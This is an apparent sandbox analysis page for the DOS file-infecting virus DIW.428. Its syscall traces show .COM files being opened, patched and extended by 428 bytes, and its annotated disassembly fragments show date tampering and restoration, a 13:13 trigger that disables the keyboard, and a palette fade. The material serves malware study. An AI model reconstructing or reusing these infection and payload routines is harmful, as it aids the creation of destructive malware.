Sample viewer

vx.netlux.org/Virus.DOS.DIW.428


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:49:56.188869495Z 47 PC: 12a6d | Get disk transfer address
2018-12-17T22:49:56.198691424Z 26 PC: 12a7b | Set disk transfer address
2018-12-17T22:49:56.19970392Z 42 PC: 12a7f | Get date 0x12a7f: mov word ptr cs:[di + 0xe], cx
; Reading note: this listing starts one instruction earlier, at 0x12a7f on the "Get date"
; trace row directly above, where CX is stored to cs:[di + 0xe]. DOS Get date (op 42)
; returns CX = year, DH = month, DL = day, so the two stores keep the real system date.
; The code then shifts the date, runs three routines, and puts the DTA and the date back.
; NOTE(review): files written while the date is shifted would presumably carry the shifted
; date as their modification stamp, a possible forensic marker. Confirm on a sample image.
0x12a83: mov word ptr cs:[di + 0x10], dx    ; keep month/day (DX) beside the saved year
0x12a87: dec cx                              ; year - 1
0x12a88: inc dx                              ; day + 1 (low byte of DX)
0x12a89: mov ah, 0x2b                        ; AH = 2Bh, DOS Set date (op 43 in the trace)
0x12a8b: int 0x21                            ; clock now holds the shifted date; AL (status) is not checked in the visible code
0x12a8d: pop dx                              ; value was pushed before the visible listing; its meaning cannot be determined here
0x12a8e: add dx, 3
0x12a91: call 0x12b1d                        ; trace rows between Set date and Get time fall here: Find first/next, and per .COM file a 3-byte read, a 3-byte write and a 428-byte write
0x12a94: call 0x12b46                        ; trace shows the Get time call (PC 12b52) inside this routine
0x12a97: call 0x12ba9                        ; trace shows a second Find first (PC 12bce) inside this routine
0x12a9a: mov ah, 0x1a                        ; AH = 1Ah, DOS Set disk transfer address
0x12a9c: mov dx, word ptr cs:[di + 0xc]      ; slot written outside this listing; presumably the DTA returned at PC 12a6d
0x12aa0: int 0x21
0x12aa2: mov cx, word ptr cs:[di + 0xe]      ; reload the saved year
0x12aa6: mov dx, word ptr cs:[di + 0x10]     ; reload the saved month/day
0x12aaa: mov ah, 0x2b
0x12aac: int 0x21                            ; Set date again with the saved values, so the clock looks untouched afterwards
0x12aae: mov bx, 0x100                       ; 0x100 is the offset at which DOS loads a .COM image
0x12ab1: jmp bx                              ; control passes to offset 0x100, presumably the original program, which then appears to run normally
2018-12-17T22:49:56.201413198Z 43 PC: 12a8d | Set date
2018-12-17T22:49:56.204250405Z 78 PC: 12b25 | Find first file
2018-12-17T22:49:56.21100751Z 47 PC: 12b2b | Get disk transfer address
2018-12-17T22:49:56.218611627Z 61 PC: 12aca | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:49:56.226090416Z 63 PC: 12ad8 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:49:56.237094143Z 66 PC: 12af3 | Move file pointer
2018-12-17T22:49:56.238802906Z 64 PC: 12afc | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:49:56.241695611Z 66 PC: 12b08 | Move file pointer
2018-12-17T22:49:56.245546868Z 64 PC: 12b14 | Write file or device (Write 428 bytes on handle 5)
2018-12-17T22:49:56.261067317Z 62 PC: 12b1b | Close file
2018-12-17T22:49:56.270467892Z 79 PC: 12b41 | Find next file
2018-12-17T22:49:56.274539367Z 61 PC: 12aca | Open file (Filename = 'PRINT.COM')
2018-12-17T22:49:56.280857253Z 63 PC: 12ad8 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:49:56.287618626Z 66 PC: 12af3 | Move file pointer
2018-12-17T22:49:56.289706Z 64 PC: 12afc | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:49:56.29300451Z 66 PC: 12b08 | Move file pointer
2018-12-17T22:49:56.295221644Z 64 PC: 12b14 | Write file or device (Write 428 bytes on handle 5)
2018-12-17T22:49:56.301202878Z 62 PC: 12b1b | Close file
2018-12-17T22:49:56.309573681Z 79 PC: 12b41 | Find next file
2018-12-17T22:49:56.312583673Z 61 PC: 12aca | Open file (Filename = 'HELLO.COM')
2018-12-17T22:49:56.319742852Z 63 PC: 12ad8 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:49:56.324086355Z 66 PC: 12af3 | Move file pointer
2018-12-17T22:49:56.325181034Z 64 PC: 12afc | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:49:56.327004872Z 66 PC: 12b08 | Move file pointer
2018-12-17T22:49:56.328397689Z 64 PC: 12b14 | Write file or device (Write 428 bytes on handle 5)
2018-12-17T22:49:56.333408595Z 62 PC: 12b1b | Close file
2018-12-17T22:49:56.338653685Z 79 PC: 12b41 | Find next file
2018-12-17T22:49:56.341223697Z 61 PC: 12aca | Open file (Filename = 'PHANG.COM')
2018-12-17T22:49:56.345563446Z 63 PC: 12ad8 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:49:56.349529791Z 66 PC: 12af3 | Move file pointer
2018-12-17T22:49:56.351046064Z 64 PC: 12afc | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:49:56.353143353Z 66 PC: 12b08 | Move file pointer
2018-12-17T22:49:56.354432627Z 64 PC: 12b14 | Write file or device (Write 428 bytes on handle 5)
2018-12-17T22:49:56.356931953Z 62 PC: 12b1b | Close file
2018-12-17T22:49:56.362095517Z 79 PC: 12b41 | Find next file
2018-12-17T22:49:56.364337247Z 61 PC: 12aca | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:49:56.371937791Z 63 PC: 12ad8 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:49:56.375808531Z 66 PC: 12af3 | Move file pointer
2018-12-17T22:49:56.376680862Z 64 PC: 12afc | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:49:56.379304394Z 66 PC: 12b08 | Move file pointer
2018-12-17T22:49:56.380420096Z 64 PC: 12b14 | Write file or device (Write 428 bytes on handle 5)
2018-12-17T22:49:56.383121427Z 62 PC: 12b1b | Close file
2018-12-17T22:49:56.390915842Z 79 PC: 12b41 | Find next file
2018-12-17T22:49:56.393446556Z 61 PC: 12aca | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:49:56.400723226Z 63 PC: 12ad8 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:49:56.407102515Z 66 PC: 12af3 | Move file pointer
2018-12-17T22:49:56.408677361Z 64 PC: 12afc | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:49:56.411347137Z 66 PC: 12b08 | Move file pointer
2018-12-17T22:49:56.413040723Z 64 PC: 12b14 | Write file or device (Write 428 bytes on handle 5)
2018-12-17T22:49:56.424741024Z 62 PC: 12b1b | Close file
2018-12-17T22:49:56.433175905Z 79 PC: 12b41 | Find next file
2018-12-17T22:49:56.435681504Z 61 PC: 12aca | Open file (Filename = 'PAH.COM')
2018-12-17T22:49:56.44028275Z 63 PC: 12ad8 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:49:56.444620561Z 66 PC: 12af3 | Move file pointer
2018-12-17T22:49:56.445764097Z 64 PC: 12afc | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:49:56.448365179Z 66 PC: 12b08 | Move file pointer
2018-12-17T22:49:56.449594058Z 64 PC: 12b14 | Write file or device (Write 428 bytes on handle 5)
2018-12-17T22:49:56.451501464Z 62 PC: 12b1b | Close file
2018-12-17T22:49:56.458605395Z 79 PC: 12b41 | Find next file
2018-12-17T22:49:56.460767402Z 61 PC: 12aca | Open file (Filename = 'TEST.COM')
2018-12-17T22:49:56.464822418Z 63 PC: 12ad8 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:49:56.469582333Z 66 PC: 12af3 | Move file pointer
2018-12-17T22:49:56.470657615Z 64 PC: 12afc | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:49:56.472465293Z 66 PC: 12b08 | Move file pointer
2018-12-17T22:49:56.474116655Z 64 PC: 12b14 | Write file or device (Write 428 bytes on handle 5)
2018-12-17T22:49:56.47926509Z 62 PC: 12b1b | Close file
2018-12-17T22:49:56.484463898Z 79 PC: 12b41 | Find next file
2018-12-17T22:49:56.486818902Z 44 PC: 12b52 | Get time 0x12b52: cmp ch, 0xd
; Reading note: this listing starts one instruction earlier, with `cmp ch, 0xd` at 0x12b52
; on the "Get time" trace row directly above. DOS Get time (op 44) returns CH = hour and
; CL = minute. The window ends at 0x12b7a; branch targets 0x12b85 and 0x12b9d are not shown.
; NOTE(review): the run parameters on this page (Hour/Min 0/0, 13/0, 13/13) line up with
; this test and were presumably chosen by the sandbox to probe it.
0x12b55: jl 0x12b9d                          ; hour below 13 (signed compare): skip the block
0x12b57: cmp cl, 0xd
0x12b5a: jne 0x12b9d                         ; minute not 13: skip; fall-through needs hour >= 13 and minute == 13
0x12b5c: cli                                 ; interrupts masked around the port write
0x12b5d: mov al, 0xad
0x12b5f: out 0x64, al                        ; port 0x64 is the keyboard-controller command port and 0xAD its "disable keyboard" command; this direct hardware access does not appear in the DOS syscall trace
0x12b61: mov cx, 0xff
0x12b64: loop 0x12b64                        ; short busy-wait, 255 iterations
0x12b66: sti
0x12b67: mov ch, 0
0x12b69: mov cl, 0xf
0x12b6b: mov ah, 0x10
0x12b6d: mov al, 7
0x12b6f: mov bl, cl                          ; BL = 0x0F, the palette register to query
0x12b71: int 0x10                            ; video BIOS AX = 1007h: read palette register BL, value returned in BH
0x12b73: cmp bh, 0
0x12b76: je 0x12b85                          ; register already 0: branch to code outside the window
0x12b78: mov ch, 1
0x12b7a: sub bh, 1                           ; value stepped down by one; presumably a screen fade, but the rest is not visible here
2018-12-17T22:49:56.488413066Z 78 PC: 12bce | Find first file
2018-12-17T22:49:56.491917318Z 26 PC: 12aa2 | Set disk transfer address
2018-12-17T22:49:56.493622144Z 43 PC: 12aae | Set date

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":10051,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:06.010769109Z 47 PC: 12a6d | Get disk transfer address
2018-12-25T12:27:06.026358346Z 26 PC: 12a7b | Set disk transfer address
2018-12-25T12:27:06.027532774Z 42 PC: 12a7f | Get date 0x12a7f: mov word ptr cs:[di + 0xe], cx
; Reading note: this listing starts one instruction earlier, at 0x12a7f on the "Get date"
; trace row directly above, where CX is stored to cs:[di + 0xe]. DOS Get date (op 42)
; returns CX = year, DH = month, DL = day, so the two stores keep the real system date.
; The code then shifts the date, runs three routines, and puts the DTA and the date back.
; NOTE(review): files written while the date is shifted would presumably carry the shifted
; date as their modification stamp, a possible forensic marker. Confirm on a sample image.
0x12a83: mov word ptr cs:[di + 0x10], dx    ; keep month/day (DX) beside the saved year
0x12a87: dec cx                              ; year - 1
0x12a88: inc dx                              ; day + 1 (low byte of DX)
0x12a89: mov ah, 0x2b                        ; AH = 2Bh, DOS Set date (op 43 in the trace)
0x12a8b: int 0x21                            ; clock now holds the shifted date; AL (status) is not checked in the visible code
0x12a8d: pop dx                              ; value was pushed before the visible listing; its meaning cannot be determined here
0x12a8e: add dx, 3
0x12a91: call 0x12b1d                        ; trace rows between Set date and Get time fall here: Find first/next, and per .COM file a 3-byte read, a 3-byte write and a 428-byte write
0x12a94: call 0x12b46                        ; trace shows the Get time call (PC 12b52) inside this routine
0x12a97: call 0x12ba9                        ; trace shows a second Find first (PC 12bce) inside this routine
0x12a9a: mov ah, 0x1a                        ; AH = 1Ah, DOS Set disk transfer address
0x12a9c: mov dx, word ptr cs:[di + 0xc]      ; slot written outside this listing; presumably the DTA returned at PC 12a6d
0x12aa0: int 0x21
0x12aa2: mov cx, word ptr cs:[di + 0xe]      ; reload the saved year
0x12aa6: mov dx, word ptr cs:[di + 0x10]     ; reload the saved month/day
0x12aaa: mov ah, 0x2b
0x12aac: int 0x21                            ; Set date again with the saved values, so the clock looks untouched afterwards
0x12aae: mov bx, 0x100                       ; 0x100 is the offset at which DOS loads a .COM image
0x12ab1: jmp bx                              ; control passes to offset 0x100, presumably the original program, which then appears to run normally
2018-12-25T12:27:06.029619977Z 43 PC: 12a8d | Set date
2018-12-25T12:27:06.033664314Z 78 PC: 12b25 | Find first file
2018-12-25T12:27:06.044040437Z 47 PC: 12b2b | Get disk transfer address
2018-12-25T12:27:06.045063897Z 61 PC: 12aca | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:27:06.051994703Z 63 PC: 12ad8 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:27:06.058727723Z 66 PC: 12af3 | Move file pointer
2018-12-25T12:27:06.060040523Z 64 PC: 12afc | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:27:06.063240247Z 66 PC: 12b08 | Move file pointer
2018-12-25T12:27:06.064597012Z 64 PC: 12b14 | Write file or device (Write 428 bytes on handle 5)
2018-12-25T12:27:06.098802618Z 62 PC: 12b1b | Close file
2018-12-25T12:27:06.107618068Z 79 PC: 12b41 | Find next file
2018-12-25T12:27:06.120512033Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.130445781Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.137240227Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.149075994Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.15212449Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.154186833Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.158622481Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.166138164Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.168745553Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.176245936Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.182440211Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.183822208Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.187316169Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.189627719Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.1975801Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.206940189Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.210262487Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.217102927Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.22473228Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.2265144Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.233938781Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.236540965Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.24300504Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.251825467Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.255112057Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.263162453Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.269475368Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.270931895Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.274685076Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.276168258Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.279031228Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.290961879Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.294439248Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.302191852Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.309140684Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.310786036Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.313461233Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.315385065Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.323436641Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.331523405Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.334970093Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.341619348Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.348070614Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.350515134Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.353383993Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.355000297Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.358531989Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.36684465Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.370049827Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.377727245Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.384840188Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.386392865Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.389350395Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.391720632Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.399598997Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.407446183Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.410549398Z 44 PC: 12b52 | Get time 0x12b52: cmp ch, 0xd
; Reading note: this listing starts one instruction earlier, with `cmp ch, 0xd` at 0x12b52
; on the "Get time" trace row directly above. DOS Get time (op 44) returns CH = hour and
; CL = minute. The window ends at 0x12b7a; branch targets 0x12b85 and 0x12b9d are not shown.
; NOTE(review): the run parameters on this page (Hour/Min 0/0, 13/0, 13/13) line up with
; this test and were presumably chosen by the sandbox to probe it.
0x12b55: jl 0x12b9d                          ; hour below 13 (signed compare): skip the block
0x12b57: cmp cl, 0xd
0x12b5a: jne 0x12b9d                         ; minute not 13: skip; fall-through needs hour >= 13 and minute == 13
0x12b5c: cli                                 ; interrupts masked around the port write
0x12b5d: mov al, 0xad
0x12b5f: out 0x64, al                        ; port 0x64 is the keyboard-controller command port and 0xAD its "disable keyboard" command; this direct hardware access does not appear in the DOS syscall trace
0x12b61: mov cx, 0xff
0x12b64: loop 0x12b64                        ; short busy-wait, 255 iterations
0x12b66: sti
0x12b67: mov ch, 0
0x12b69: mov cl, 0xf
0x12b6b: mov ah, 0x10
0x12b6d: mov al, 7
0x12b6f: mov bl, cl                          ; BL = 0x0F, the palette register to query
0x12b71: int 0x10                            ; video BIOS AX = 1007h: read palette register BL, value returned in BH
0x12b73: cmp bh, 0
0x12b76: je 0x12b85                          ; register already 0: branch to code outside the window
0x12b78: mov ch, 1
0x12b7a: sub bh, 1                           ; value stepped down by one; presumably a screen fade, but the rest is not visible here
2018-12-25T12:27:06.412960184Z 78 PC: 12bce | Find first file
2018-12-25T12:27:06.418691764Z 26 PC: 12aa2 | Set disk transfer address
2018-12-25T12:27:06.420925797Z 43 PC: 12aae | Set date

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":13,"Min":0,"Second":0,"TimeBased":true,"OriginalID":10051,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:06.116766927Z 47 PC: 12a6d | Get disk transfer address
2018-12-25T12:27:06.119574854Z 26 PC: 12a7b | Set disk transfer address
2018-12-25T12:27:06.120717041Z 42 PC: 12a7f | Get date 0x12a7f: mov word ptr cs:[di + 0xe], cx
; Reading note: this listing starts one instruction earlier, at 0x12a7f on the "Get date"
; trace row directly above, where CX is stored to cs:[di + 0xe]. DOS Get date (op 42)
; returns CX = year, DH = month, DL = day, so the two stores keep the real system date.
; The code then shifts the date, runs three routines, and puts the DTA and the date back.
; NOTE(review): files written while the date is shifted would presumably carry the shifted
; date as their modification stamp, a possible forensic marker. Confirm on a sample image.
0x12a83: mov word ptr cs:[di + 0x10], dx    ; keep month/day (DX) beside the saved year
0x12a87: dec cx                              ; year - 1
0x12a88: inc dx                              ; day + 1 (low byte of DX)
0x12a89: mov ah, 0x2b                        ; AH = 2Bh, DOS Set date (op 43 in the trace)
0x12a8b: int 0x21                            ; clock now holds the shifted date; AL (status) is not checked in the visible code
0x12a8d: pop dx                              ; value was pushed before the visible listing; its meaning cannot be determined here
0x12a8e: add dx, 3
0x12a91: call 0x12b1d                        ; trace rows between Set date and Get time fall here: Find first/next, and per .COM file a 3-byte read, a 3-byte write and a 428-byte write
0x12a94: call 0x12b46                        ; trace shows the Get time call (PC 12b52) inside this routine
0x12a97: call 0x12ba9                        ; trace shows a second Find first (PC 12bce) inside this routine
0x12a9a: mov ah, 0x1a                        ; AH = 1Ah, DOS Set disk transfer address
0x12a9c: mov dx, word ptr cs:[di + 0xc]      ; slot written outside this listing; presumably the DTA returned at PC 12a6d
0x12aa0: int 0x21
0x12aa2: mov cx, word ptr cs:[di + 0xe]      ; reload the saved year
0x12aa6: mov dx, word ptr cs:[di + 0x10]     ; reload the saved month/day
0x12aaa: mov ah, 0x2b
0x12aac: int 0x21                            ; Set date again with the saved values, so the clock looks untouched afterwards
0x12aae: mov bx, 0x100                       ; 0x100 is the offset at which DOS loads a .COM image
0x12ab1: jmp bx                              ; control passes to offset 0x100, presumably the original program, which then appears to run normally
2018-12-25T12:27:06.122798059Z 43 PC: 12a8d | Set date
2018-12-25T12:27:06.12708844Z 78 PC: 12b25 | Find first file
2018-12-25T12:27:06.153463531Z 47 PC: 12b2b | Get disk transfer address
2018-12-25T12:27:06.155867178Z 61 PC: 12aca | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:27:06.163137306Z 63 PC: 12ad8 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:27:06.171524614Z 66 PC: 12af3 | Move file pointer
2018-12-25T12:27:06.173743553Z 64 PC: 12afc | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:27:06.176754138Z 66 PC: 12b08 | Move file pointer
2018-12-25T12:27:06.179528877Z 64 PC: 12b14 | Write file or device (Write 428 bytes on handle 5)
2018-12-25T12:27:06.194595615Z 62 PC: 12b1b | Close file
2018-12-25T12:27:06.202532259Z 79 PC: 12b41 | Find next file
2018-12-25T12:27:06.206154152Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.212516375Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.219460819Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.222170537Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.225011713Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.226637621Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.23109957Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.239019114Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.241608778Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.248551396Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.25554124Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.257462702Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.260557969Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.262836148Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.271245038Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.278995118Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.282385015Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.290628068Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.297449246Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.300242778Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.305279029Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.307119372Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.310069743Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.318500079Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.321383395Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.327563076Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.334921264Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.338304947Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.34130905Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.343896809Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.347061902Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.354921118Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.358153326Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.365750678Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.373251857Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.376524929Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.382929252Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.384267974Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.392847871Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.40121777Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.404345308Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.411334004Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.417874023Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.419339865Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.422241302Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.424726178Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.427903572Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.435817538Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.439576352Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.44677017Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.453045507Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.455453924Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.45834441Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.460044382Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.469257908Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.477827273Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.480489337Z 44 PC: 12b52 | Get time 0x12b52: cmp ch, 0xd
; Reading note: this listing starts one instruction earlier, with `cmp ch, 0xd` at 0x12b52
; on the "Get time" trace row directly above. DOS Get time (op 44) returns CH = hour and
; CL = minute. The window ends at 0x12b7a; branch targets 0x12b85 and 0x12b9d are not shown.
; NOTE(review): the run parameters on this page (Hour/Min 0/0, 13/0, 13/13) line up with
; this test and were presumably chosen by the sandbox to probe it.
0x12b55: jl 0x12b9d                          ; hour below 13 (signed compare): skip the block
0x12b57: cmp cl, 0xd
0x12b5a: jne 0x12b9d                         ; minute not 13: skip; fall-through needs hour >= 13 and minute == 13
0x12b5c: cli                                 ; interrupts masked around the port write
0x12b5d: mov al, 0xad
0x12b5f: out 0x64, al                        ; port 0x64 is the keyboard-controller command port and 0xAD its "disable keyboard" command; this direct hardware access does not appear in the DOS syscall trace
0x12b61: mov cx, 0xff
0x12b64: loop 0x12b64                        ; short busy-wait, 255 iterations
0x12b66: sti
0x12b67: mov ch, 0
0x12b69: mov cl, 0xf
0x12b6b: mov ah, 0x10
0x12b6d: mov al, 7
0x12b6f: mov bl, cl                          ; BL = 0x0F, the palette register to query
0x12b71: int 0x10                            ; video BIOS AX = 1007h: read palette register BL, value returned in BH
0x12b73: cmp bh, 0
0x12b76: je 0x12b85                          ; register already 0: branch to code outside the window
0x12b78: mov ch, 1
0x12b7a: sub bh, 1                           ; value stepped down by one; presumably a screen fade, but the rest is not visible here
2018-12-25T12:27:06.483800816Z 78 PC: 12bce | Find first file
2018-12-25T12:27:06.489975683Z 26 PC: 12aa2 | Set disk transfer address
2018-12-25T12:27:06.491880626Z 43 PC: 12aae | Set date

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":13,"Min":13,"Second":0,"TimeBased":true,"OriginalID":10051,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:06.219576724Z 47 PC: 12a6d | Get disk transfer address
2018-12-25T12:27:06.22105784Z 26 PC: 12a7b | Set disk transfer address
2018-12-25T12:27:06.222274223Z 42 PC: 12a7f | Get date 0x12a7f: mov word ptr cs:[di + 0xe], cx
; Reading note: this listing starts one instruction earlier, at 0x12a7f on the "Get date"
; trace row directly above, where CX is stored to cs:[di + 0xe]. DOS Get date (op 42)
; returns CX = year, DH = month, DL = day, so the two stores keep the real system date.
; The code then shifts the date, runs three routines, and puts the DTA and the date back.
; NOTE(review): files written while the date is shifted would presumably carry the shifted
; date as their modification stamp, a possible forensic marker. Confirm on a sample image.
0x12a83: mov word ptr cs:[di + 0x10], dx    ; keep month/day (DX) beside the saved year
0x12a87: dec cx                              ; year - 1
0x12a88: inc dx                              ; day + 1 (low byte of DX)
0x12a89: mov ah, 0x2b                        ; AH = 2Bh, DOS Set date (op 43 in the trace)
0x12a8b: int 0x21                            ; clock now holds the shifted date; AL (status) is not checked in the visible code
0x12a8d: pop dx                              ; value was pushed before the visible listing; its meaning cannot be determined here
0x12a8e: add dx, 3
0x12a91: call 0x12b1d                        ; trace rows between Set date and Get time fall here: Find first/next, and per .COM file a 3-byte read, a 3-byte write and a 428-byte write
0x12a94: call 0x12b46                        ; trace shows the Get time call (PC 12b52) inside this routine
0x12a97: call 0x12ba9                        ; trace shows a second Find first (PC 12bce) inside this routine
0x12a9a: mov ah, 0x1a                        ; AH = 1Ah, DOS Set disk transfer address
